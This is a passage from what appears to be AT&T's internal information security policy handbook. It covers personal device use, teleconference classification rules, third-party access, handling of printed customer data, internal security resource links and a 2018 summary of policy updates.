a. When the following requirements are satisfied:
i. The AT&T proprietary data or data that AT&T is responsible to protect, must not be placed at increased risk, and must
be protected from unauthorized disclosure, destruction or modification.
ii. The software must be licensed.
iii. The software and hardware must be fully compliant with ASPR (e.g., security fixes, anti-virus software, personal
firewall, VPN).
iv. The software and hardware must not disrupt the operation of AT&T systems.
v. The software and hardware must not disable or conflict with the operation of any Technology Strategies and
Standards (TSS) approved security software.
vi. The software and hardware must not enable an insecure path from the Internet to the corporate WAN.
vii. The software and hardware must only support wireless connections compliant with ASPR-0468: Remote Access (e.g.
using AT&T approved VPNs).
viii. Its use is consistent with TSS guidelines and/or exception process at: (http://tss.att.com/home.cfm).
— or —
b. When using a personal device (BYOD) for only voice calling functionality or with AT&T approved BYOD software (e.g., HVD thin
client accessing an internally hosted AT&T HVD environment) that is using no functionality other than which the software
allows (e.g. screen image functionality).
The only exception is where there is a business need for AT&T employees to be able to access AT&T proprietary data for disaster recovery
purposes. In that case the employees must be pre-authorized by an officer of AT&T (level 6 or higher) to access the data using a non-compliant
device as a matter of last resort. The authorization must be maintained in writing (email acceptable) by the officer and must be reauthorized every
twelve (12) months.

AT&T reserves all rights with regard to its data, and data for which it is responsible, and as such reserves the right to inspect, examine or
forensically investigate all non-AT&T owned hardware, software, media and associated data used in support of AT&T business just as it would for
AT&T owned hardware, software and media.

Teleconferencing
Content Source: ASPR-0291: Teleconferencing: AT&T Proprietary (Internal Use Only)
Where a conference call or online meeting will discuss only AT&T Proprietary (Internal Use Only) information, the following requirements apply:

a. The meeting invitation must state the classification of information that will be discussed.
b. Except for normal business-as-usual meetings, such as staff meetings or regular project meetings, the conference host should state the
classification of information to the attendees at the start of the meeting. Some judgment and discretion is permitted.
c. When a meeting is to be recorded, the host must state the classification of information at the start of the meeting.
d. Except for normal business-as-usual meetings, such as staff meetings or regular project meetings, the Host should ask that only people
with a reason to hear the information stay on the call. Some judgment and discretion is permitted.
e. Any attendee must state if he or she knows that someone is on the call who should not be attending.

See:
 ASPR-0194: Non-Disclosure Agreements (NDA)
 ASPR-0195: Sharing Information
 ASPR-0196: External Disclosure of AT&T Proprietary Information
 ASPR-0292: Teleconferencing: More Restrictive Classifications

Content Source: ASPR-0292: Teleconferencing: More Restrictive Classifications


Where a conference call or online meeting will discuss information that is AT&T Proprietary (Restricted), AT&T Proprietary (Secure Restricted) or
AT&T Proprietary (Sensitive Personal Information), the following requirements apply:

1. Before the Meeting


a. The meeting invitation or agenda must state the classification(s) of information that will be discussed.
b. The meeting invitation must alert invitees not to forward the meeting invitation to other persons without the permission of the
meeting host or unless it is obvious that the person to be invited is appropriate for the discussion and has a business need to attend.
Anyone forwarding an invitation should notify the host that the invitation was forwarded except when the person forwarding the
invitation or the recipient would ordinarily have the right to share the information to be presented at the meeting.
c. Where possible, meetings should use one-time meeting codes that allow participants to join the meeting.
d. Sharing AT&T Proprietary (Sensitive Personal Information) on a conference call or online meeting could violate US and international
privacy laws if all attendees are not identified and authorized to share that information. These meetings should not be recorded.
(See ASPR-0206: Pre-Classified Data Elements).
e. Sharing AT&T Proprietary (Secure Restricted) information on a conference call or online meeting could severely and substantially
harm AT&T if all attendees are not identified and authorized to share that information. Only an Officer of AT&T may authorize
disclosure of this information or authorize an individual to receive this information. These meetings should not be recorded, and may
only be recorded with the explicit permission of an Officer of AT&T (Level 6 or higher). (See ASPR-0211: AT&T Proprietary (Secure
Restricted).)
2. At the Start of the Meeting
a. The Host should state the classification of information to the attendees at the start of the meeting.
b. When a meeting is to be recorded, the host must state the classification of information at the start of the meeting.
c. Where a meeting will include a discussion of less restrictive information with persons not authorized to discuss the restrictive
information in the call, the agenda must be established so that any person not authorized for the more restrictive information will
be on the call only for the information that the person is authorized to share.
d. The Host or a delegate must make certain that all attendees are appropriate to the call.
e. All attendees should identify themselves on online meetings. This requirement may be satisfied by use of the online attendee
identification features in some tools such as AT&T Connect, Live Meeting or Net Meeting. Where the number of attendees is large,
there must be a process to identify everyone.

f. The meeting must not continue if there is uncertainty about the appropriateness of anyone attending the meeting. All unknown
attendees must be identified.
g. The meeting may continue once it is clear that anyone not authorized has left the meeting.
3. During the Meeting
a. Attendees must try to be aware of the presence of unauthorized individuals in the vicinity when listening to the audio portion of a
conference over speaker-phone or computer speakers.
b. Attendees must not view the meeting presentation in public places or in places where unauthorized persons may observe the
meeting content.
c. Attendees must not use speakerphones in public places or in places where unauthorized persons may overhear the meeting.
d. Attendees in open spaces in AT&T facilities must consider turning off monitors or flipping down laptop screens when walking away
from their desk during the meeting.

Third Party Access to AT&T Resources


Content Source: ASPR-1015: Third Party Access to AT&T Information
Persons who are not AT&T employees (e.g. Contractors, Suppliers, or Vendors) must have appropriate contractual agreements in place that
establish their relationship to the company and authorize their access to AT&T resources prior to being granted access to proprietary information
of any classification.

Content Source: ASPR-0194: Non-Disclosure Agreements (NDA)


All proprietary information provided to non-AT&T employees, either in contemplation of, or in actual performance of, work, or in connection with a
proposal to provide services or products to a customer, must be protected under the terms of a written Non-Disclosure Agreement (NDA) and/or
agreement regarding intellectual property. The NDA will specify the permissible use and further disclosure of the information.

Information Belonging or Pertaining to Customers of AT&T


Customer Data: Overview
Content Source: ASPR Glossary
Key Terms
Customer Data
Refers to the data belonging to a customer of AT&T. It includes all information handled, stored or transmitted by AT&T under contract or
terms and conditions on behalf of the customer, but excludes all customer details. It includes user generated content.
Customer Details
The data AT&T collects from a customer in connection with providing products and services to that customer. Examples include account
information (which may include Customer Proprietary Network Information (CPNI)), and technical and usage information.
Conduit
Any method of transporting, distributing or transmitting information that does not involve the intentional processing of that information.

HINTS:
 “Customer Data” is primarily the customer's own data which may transit AT&T systems or networks, but which AT&T would not normally
read, interpret or process.
 “Customer Details” includes information that AT&T would know through its relationship with the customer.

Categorization of Customer Data


Content Source: ASPR-0580
Since the content of Customer Data is not normally known by AT&T, certainly not on a per item basis, the sensitivity for all Customer Data that is
part of a defined service or service subset must be considered the same.

For all services or service subsets that process Customer Data (this excludes Customer Data that is transmitted within a conduit), the Service Owner
together with the Business Unit's Legal Counsel must determine whether or not the Customer Data concerned will be considered sensitive. The
determination of whether the Customer Data is "sensitive" or "not sensitive" must be documented in the service description.
Customer Data under AT&T control must not be accessible to anyone other than those explicitly authorized by the customer, or those AT&T
employees and contractors with a business need (e.g. service provisioning, problem determination and resolution).

Non-Sensitive "Customer Data" Printed Material


Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
NOTE: The table below covers information that has been judged as "non-sensitive" customer data as documented in the service description.
See section 5.5.3: Sensitive "Customer Data" Printed Material for handling sensitive customer data.

Columns: Activity; Inside AT&T controlled space; Outside AT&T controlled space

Activity: Use and storage
  Inside AT&T controlled space:
    Must be kept away from casual observers.
    Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe).
  Outside AT&T controlled space:
    Should never be taken outside AT&T controlled space. If there is an overriding business need then:
    a. Must obtain, and retain, written approval from an Officer of AT&T (Level 6 or higher).
    b. Must be kept away from casual observers.
    c. Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe, car trunk/boot, hotel room safe).
    d. Must not leave the direct supervision of the custodian when traveling on public transport (e.g. taxi trunk/boot, bus hold/baggage storage, checked baggage on airplane).

Activity: Printing & copying (same requirements inside and outside AT&T controlled space)
  Should not print or copy. If there is an overriding business need then:
   Must obtain (and retain) approval from an Executive Director (Level 4)
  and
   Must supervise the printer or copier, or must print or copy in an office or area where access is limited to authorized personnel.
  Any copies of customer data created for AT&T employee/contractor use must be destroyed when no longer required (see ASPR-0174: Destruction of Hard Copy Information).

Activity: Distribution
  Inside AT&T controlled space:
    Should be hand delivered by originator or custodian.
    Should use double envelopes with the inner envelope marked "Private" when using AT&T internal mail.
    Markings (see ASPR-1017: Labels and Marking) must not be visibly displayed on the envelopes. Following the expected delivery timeframe the sender must confirm safe receipt.
  Outside AT&T controlled space:
    Should not be distributed outside AT&T controlled space. If there is an overriding business need then:
     Must obtain (and retain) approval from an Executive Director (Level 4).
     Should, with the exception of individual Customer Data sent to customers:
      i. use double envelopes with the inner envelope marked "Private", and
      ii. be possible to track the package along its route, and
      iii. be signed for upon delivery whenever delivery is to a location external to AT&T controlled space or whenever the delivery utilizes non-AT&T personnel or service.
    Markings (see ASPR-1017: Labels and Marking) must not be visibly displayed on the envelopes. Following the expected delivery timeframe the sender must confirm safe receipt.

Activity: Fax (same requirements inside and outside AT&T controlled space)
  Should not be faxed. If there is an overriding business need then:
  a. Must obtain approval from an Executive Director (Level 4). Approval must be retained for a period of time consistent with RIM (see ASPR-0191: Records and Information Management (RIM)).
  b. Must verify the receiving fax number.
  c. Should include a fax transmittal statement.
  d. Must only use fax machines that are supervised with authorized personnel, or are located in offices/areas where access is limited to authorized personnel, or validated within a
business process. business process.

Where faxing to a supervised machine, upon completion Where faxing to a supervised machine, upon completion
the sender must confirm safe receipt. the sender must confirm safe receipt.
Destruction Must shred. Must shred.

Sensitive "Customer Data" Printed Material


Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
NOTE: The table below covers information that has been judged as “sensitive” customer data as documented in the service description.
See section Non-Sensitive "Customer Data" Printed Material for handling non-sensitive customer data.

Use and storage
  Inside AT&T controlled space:
  Must be kept away from casual observers.
  Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe).
  Outside AT&T controlled space:
  Should never be taken outside AT&T controlled space.
  If there is an overriding business need then:
  a. Must obtain, and retain, written approval from an Officer of AT&T (Level 6 or higher).
  b. Must be kept away from casual observers.
  c. Must be kept in the direct supervision of the custodian or physically secured (e.g. desk, filing cabinet, safe, car trunk/boot, hotel room safe).
  d. Must not leave the direct supervision of the custodian when traveling on public transport (e.g. taxi trunk/boot, bus hold/baggage storage, checked baggage on airplane).

Printing & copying
  Inside and outside AT&T controlled space (the requirements are identical):
  Should not print or copy.
  If there is an overriding business need then:
   Must obtain (and retain) approval from an Executive Director (Level 4)
  — and —
   Must supervise the printer or copier,
  — OR —
   Must print or copy in an office or area where access is limited to authorized personnel.
  Any copies of customer data created for AT&T employee/contractor use must be destroyed when no longer required (see ASPR-0174: Destruction of Hard Copy Information).

Distribution
  Inside AT&T controlled space:
  Should be hand delivered by originator or custodian.
  If hand delivery is not feasible then:
  i. Approval must be obtained from an Executive Director (Level 4).
  ii. Must use double envelopes with the inner envelope marked "Private" and be possible to track the package along its route, and be signed for upon delivery.
  Markings (see ASPR-1017: Labels and Marking) must not be visibly displayed on the envelopes. Following the expected delivery timeframe the sender must confirm safe receipt.
  Outside AT&T controlled space:
  Should not be distributed outside AT&T controlled space.
  If there is an overriding business need then:
   Must obtain (and retain) approval from an Executive Director (Level 4).
   Should, with the exception of individual Customer Data sent to customers:
    i. Use double envelopes with the inner envelope marked "Private"
    — and —
    ii. Be possible to track the package along its route
    — and —
    iii. Be signed for upon delivery whenever delivery is to a location external to AT&T controlled space or whenever the delivery utilizes non-AT&T personnel or service.
  Markings (see ASPR-1017: Labels and Marking) must not be visibly displayed on the envelopes. Following the expected delivery timeframe the sender must confirm safe receipt.

Fax
  Inside and outside AT&T controlled space (the requirements are identical):
  Should not be faxed.
  If there is an overriding business need then:
  a. Must obtain approval from an Executive Director (Level 4). Approval must be retained for a period of time consistent with RIM (see ASPR-0191: Records and Information Management (RIM)).
  b. Must verify receiving fax number.
  c. Should include a fax transmittal statement.
  d. Must only use fax machines that are supervised with authorized personnel, or are located in offices/areas where access is limited to authorized personnel, or validated within a business process.
  Where faxing to a supervised machine, upon completion the sender must confirm safe receipt.

Destruction
  Inside and outside AT&T controlled space: Must shred.


Appendix A: Security Resources

Not from ASPR.
Security Request Center (Src) (https://www.e-access.att.com/src) is a one-stop website for:
 User IDs
 SecurID® tokens
 Virtual Private Network (VPN) access
 Remote Access Server (RAS) telephone access
 Mainframe access
 Intranet PIN
 Passphrase setting and resetting.
ASPR on eGRC website (https://attegrc.cso.att.com/attegrc) contains the complete set of AT&T information security policy and standards as well as the ASPR Glossary. Click the "AT&T Security and Policy Requirements (ASPR)" Workspace tab.
Information Classification Online Tool (http://cso.att.com/ICTool/index.htm) will assist you in determining the classification of information based on the attributes you select.
Information Classification FAQ (http://cso.att.com/ASPR/InfoClassificationFAQ.html)
Security website (http://security.att.com/) is a portal to AT&T organizations that provide security services to the company.
Chief Security Office (CSO) website (http://cso.att.com/) is the portal for information security services provided by CSO.
CSO Awareness and Education website (http://awareness.cso.att.com/default-new.html) has security tutorials, news and a monthly security theme.
VPN and RAS are tools for employees who work from home or from remote locations. VPN requires high speed Internet access. RAS is a dial-up link to the AT&T internal network. Employees can get information about the VPN and RAS alternatives from this link: http://cso.att.com/VPN/index.html. An employee can request VPN or RAS access through Src.
SecurID® is a small electronic device that is associated with a specific user ID and is used to sign on to more secure areas of the company network and to more restricted information. Employees can request a SecurID token through Src.


Summary of Most Recent ASPR Updates (as of April 23, 2018)


For a markup report of the ASPR changes (before and after comparison), Click Here.

# | Area | Change Classification | Topic / Key Words | ASPR Record | Modification Request (MR)
--- | --- | --- | --- | --- | ---
1 | Technology | High: Significant Financial or Operational Impact | Inspected Network Access Program (INAP) | ASPR-0020 | MR-18124863
2 | Technology | Moderate: Notable Business As Usual Impact | Clarify which systems need to display a warning notice | ASPR-0089 | MR-14151045
3 | Technology | Moderate: Notable Business As Usual Impact | Clarify Self Signed Certificate requirements | ASPR-0269 | MR-16439185
4 | Technology | Moderate: Notable Business As Usual Impact | Update SSL and TLS requirements | ASPR-0252 | MR-16737092
5 | Technology | Moderate: Notable Business As Usual Impact | Update SSL and TLS requirements | 04.03 AT&T Commercial Packet Networks: Origin of Communications Sessions | MR-16737092
6 | Technology | Moderate: Notable Business As Usual Impact | Update SSL and TLS requirements | 4.06.02 WebSphere MQ: Midrange Security settings | MR-16737092
7 | Technology | Low: Information or Clarification Change | Hypervisor separation | 2.01 Virtual Machine (VM): Platform Virtualization | MR-18111393
8 | Technology | Low: Information or Clarification Change | Update system inventory email | ASPR-0020 | MR-16341650
9 | Data | Low: Information or Clarification Change | SPI Data Element - Background Checks | ASPR-0206 | MR-18453163
10 | Process | Moderate: Notable Business As Usual Impact | Ensure AT&T Asset Protection are not impeded in investigations | ASPR-0229 | MR-16307146
11 | Process | Moderate: Notable Business As Usual Impact | Ensure AT&T Asset Protection are not impeded in investigations | ASPR-0094 | MR-16307146
12 | Process | Moderate: Notable Business As Usual Impact | Ensure AT&T Asset Protection are not impeded in investigations | ASPR-0401 | MR-16307146
13 | Process | Moderate: Notable Business As Usual Impact | Ensure AT&T Asset Protection are not impeded in investigations | ASPR-0576 | MR-16307146
14 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0052 | MR-16671957
15 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0055 | MR-16671957
16 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0352 | MR-16671957
17 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0312 | MR-16671957
18 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0043 | MR-16671957
19 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0044 | MR-16671957
20 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0045 | MR-16671957
21 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0046 | MR-16671957
22 | Process | Moderate: Notable Business As Usual Impact | Allow non-management employee access review and approval | ASPR-0047 | MR-16671957
23 | Process | Moderate: Notable Business As Usual Impact | Reduce approver level for remote access requests | ASPR-0472 | MR-16672087
24 | Process | Moderate: Notable Business As Usual Impact | Update "Federation" terms clarify exception | ASPR-0056 | MR-17777141
25 | Process | Moderate: Notable Business As Usual Impact | Update "Federation" terms clarify exception | ASPR-0558 | MR-17777141
26 | Process | Moderate: Notable Business As Usual Impact | Purchased Products and Application Security Requirements (PPASR) - includes FOSS | ASPR-0643 | MR-18450809
27 | Process | Moderate: Notable Business As Usual Impact | Purchased Products and Application Security Requirements (PPASR) - includes FOSS | ASPR-0108 | MR-18450809
28 | Process | Moderate: Notable Business As Usual Impact | Purchased Products and Application Security Requirements (PPASR) - includes FOSS | ASPR-0110 | MR-18450809
29 | Process | Moderate: Notable Business As Usual Impact | Purchased Products and Application Security Requirements (PPASR) - includes FOSS | ASPR-0431 | MR-18450809
30 | Process | Low: Information or Clarification Change | Clarify incident response actions | ASPR-0233 | MR-14567458
31 | Process | Low: Information or Clarification Change | Include CSO Cyber Forensics role in security intrusions | ASPR-0231 | MR-15845383
32 | Process | Low: Information or Clarification Change | Include CSO Cyber Forensics role in security intrusions | ASPR-0230 | MR-15845383
33 | Process | Low: Information or Clarification Change | Include CSO Cyber Forensics role in security intrusions | ASPR-0134 | MR-15845383
34 | Process | Low: Information or Clarification Change | Include CSO Cyber Forensics role in security intrusions | ASPR-0239 | MR-15845383
35 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0299 | MR-6592595
36 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0302 | MR-6592595
37 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0303 | MR-6592595
38 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0304 | MR-6592595
39 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0305 | MR-6592595
40 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0306 | MR-6592595
41 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0307 | MR-6592595
42 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0308 | MR-6592595
43 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0746 | MR-6592595
44 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0314 | MR-6592595
45 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0315 | MR-6592595
46 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0316 | MR-6592595
47 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0122 | MR-6592595
48 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0364 | MR-6592595
49 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0018 | MR-6592595
50 | Process | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | ASPR-0009 | MR-6592595
51 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0474 | MR-16736856
52 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0227 | MR-16736856
53 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0228 | MR-16736856
54 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0232 | MR-16736856
55 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0234 | MR-16736856
56 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0235 | MR-16736856
57 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0236 | MR-16736856
58 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0237 | MR-16736856
59 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0238 | MR-16736856
60 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0142 | MR-16736856
61 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | ASPR-0381 | MR-16736856
62 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | 2.5 WLAN: Reporting Suspicious Access Points (APs) and Unusual Activity | MR-16736856
63 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | 2 AS/400 Server: Policy | MR-16736856
64 | Usability | Low: Information or Clarification Change | Improve Security Incident linkages | 1.4 z/OS Mainframe: Incidents | MR-16736856
65 | Usability | Low: Information or Clarification Change | External regulations (e.g. GDPR, HIPAA, PCI, SOX) | ASPR-0481 | MR-16737090
66 | Usability | Low: Information or Clarification Change | External regulations (e.g. GDPR, HIPAA, PCI, SOX) | ASPR-0061 | MR-16737090
67 | Usability | Low: Information or Clarification Change | Correct AT&T Security Gateway references | ASPR-0600 | MR-17092637
68 | Usability | Low: Information or Clarification Change | Correct AT&T Security Gateway references | ASPR-0601 | MR-17092637
69 | Usability | Low: Information or Clarification Change | Correct AT&T Security Gateway references | ASPR-0603 | MR-17092637
70 | Usability | Low: Information or Clarification Change | Correct AT&T Security Gateway references | ASPR-0604 | MR-17092637
71 | Usability | Low: Information or Clarification Change | Correct AT&T Security Gateway references | ASPR-0606 | MR-17092637
72 | Usability | Low: Information or Clarification Change | Correct AT&T Security Gateway references | ASPR-0642 | MR-17092637
73 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0130 | MR-17166430
74 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0131 | MR-17166430
75 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0132 | MR-17166430
76 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0135 | MR-17166430
77 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0133 | MR-17166430
78 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0136 | MR-17166430
79 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0137 | MR-17166430
80 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0138 | MR-17166430
81 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0139 | MR-17166430
82 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0140 | MR-17166430
83 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0141 | MR-17166430
84 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0143 | MR-17166430
85 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0144 | MR-17166430
86 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0152 | MR-17166430
87 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0378 | MR-17166430
88 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0380 | MR-17166430
89 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0602 | MR-17166430
90 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0129 | MR-17166430
91 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0350 | MR-17166430
92 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0360 | MR-17166430
93 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0362 | MR-17166430
94 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0402 | MR-17166430
95 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0417 | MR-17166430
96 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0467 | MR-17166430
97 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0605 | MR-17166430
98 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0700 | MR-17166430
99 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0744 | MR-17166430
100 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-0802 | MR-17166430
101 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 2.01.03 DB2: Review and Retention of Audit Data | MR-17166430
102 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 4.02.01 MongoDB: Security Logging and Auditing | MR-17166430
103 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 04.02.01 Couchbase: Security Logging and Auditing | MR-17166430
104 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 4.10.2 Oracle: Audit Statements | MR-17166430
105 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 4.08.4 Oracle: remote_login_passwordfile | MR-17166430
106 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 04.03.01 Internet of Things (IoT): Tamper Resistance Requirements | MR-17166430
107 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 04.03.03 Internet of Things (IoT): Communications Requirements | MR-17166430
108 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 04.03.08 Internet of Things (IoT): Additional Requirements | MR-17166430
109 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 02.04.07 Container Virtualization: Running Containers – Security Agent and Managing Server | MR-17166430
110 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 02.01 AT&T Commercial Packet Networks: AAA for Network Elements | MR-17166430
111 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 2.04.01 Virtual Machine (VM): Configure Syslog Logging | MR-17166430
112 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 4.08 WebSphere MQ: Security Logging and Auditing | MR-17166430
113 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 03.05.01 Network Element Access Security: Audit Logs | MR-17166430
114 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | 2.1.8 Mac OS X: Audit Logging | MR-17166430
115 | Usability | Low: Information or Clarification Change | Update Security Audit Log titles | ASPR-1021 | MR-17166430
116 | Usability | Low: Information or Clarification Change | Remove reference to Data Management Policy (DMP) | ASPR-0579 | MR-18074215
117 | Usability | Low: Information or Clarification Change | Cross reference two control standards and bold "must" | ASPR-0017 | MR-18280259
118 | Usability | Low: Information or Clarification Change | Cross reference two control standards and bold "must" | ASPR-0740 | MR-18280259
119 | Usability | Low: Information or Clarification Change | Cross reference two control standards and bold "must" | ASPR-0634 | MR-18280259
120 | Usability | Internal Tracking Only: Formatting Changes | Fix broken links - Glossary Terms and Control Standards | ASPR-0109 | MR-18284445
121 | Usability | Internal Tracking Only: Formatting Changes | Fix broken links - Glossary Terms and Control Standards | ASPR-0111 | MR-18284445
122 | Usability | Internal Tracking Only: Formatting Changes | Fix broken links - Glossary Terms and Control Standards | ASPR-0349 | MR-18284445
123 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0099 | MR-18284445
124 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0167 | MR-18284445
125 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0175 | MR-18284445
126 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0189 | MR-18284445
127 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0190 | MR-18284445
128 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0432 | MR-18284445
129 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-0465 | MR-18284445
130 | Usability | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | ASPR-1080 | MR-18284445
131 | ASPR Glossary | High: Major Policy Changes | Inspected Network Access Program (INAP) | 4 Glossary Terms | MR-18124863
132 | ASPR Glossary | Moderate: Notable Business As Usual Impact | Clarify Self Signed Certificate requirements | 2 Glossary Terms | MR-16439185
133 | ASPR Glossary | Moderate: Notable Business As Usual Impact | Update SSL and TLS requirements | 1 Glossary Term | MR-16737092
134 | ASPR Glossary | Low: Information or Clarification Change | Hypervisor separation | 3 Glossary Terms | MR-18111393
135 | ASPR Glossary | Moderate: Notable Business As Usual Impact | Pseudonymization, Re-Identification, etc. | 13 Glossary Terms | MR-18283876
136 | ASPR Glossary | Moderate: Notable Business As Usual Impact | Update "Federation" terms clarify exception | 4 Glossary Terms | MR-17777141
137 | ASPR Glossary | Moderate: Notable Business As Usual Impact | Purchased Products and Application Security Requirements (PPASR) - includes FOSS | 8 Glossary Terms | MR-18450809
138 | ASPR Glossary | Low: Information or Clarification Change | Merge Application Security baseline into Service Realization | 5 Glossary Terms | MR-6592595
139 | ASPR Glossary | Low: Information or Clarification Change | Improve Security Incident linkages | 2 Glossary Terms | MR-16736856
140 | ASPR Glossary | Low: Information or Clarification Change | Update "Customer Proprietary Network Information (CPNI)" | 1 Glossary Term | MR-17123490
141 | ASPR Glossary | Low: Information or Clarification Change | Update "Resource" | 1 Glossary Term | MR-18280261
142 | ASPR Glossary | Internal Tracking Only: No Substantive Change | Fix broken links - Glossary Terms and Control Standards | 11 Glossary Terms | MR-18284445
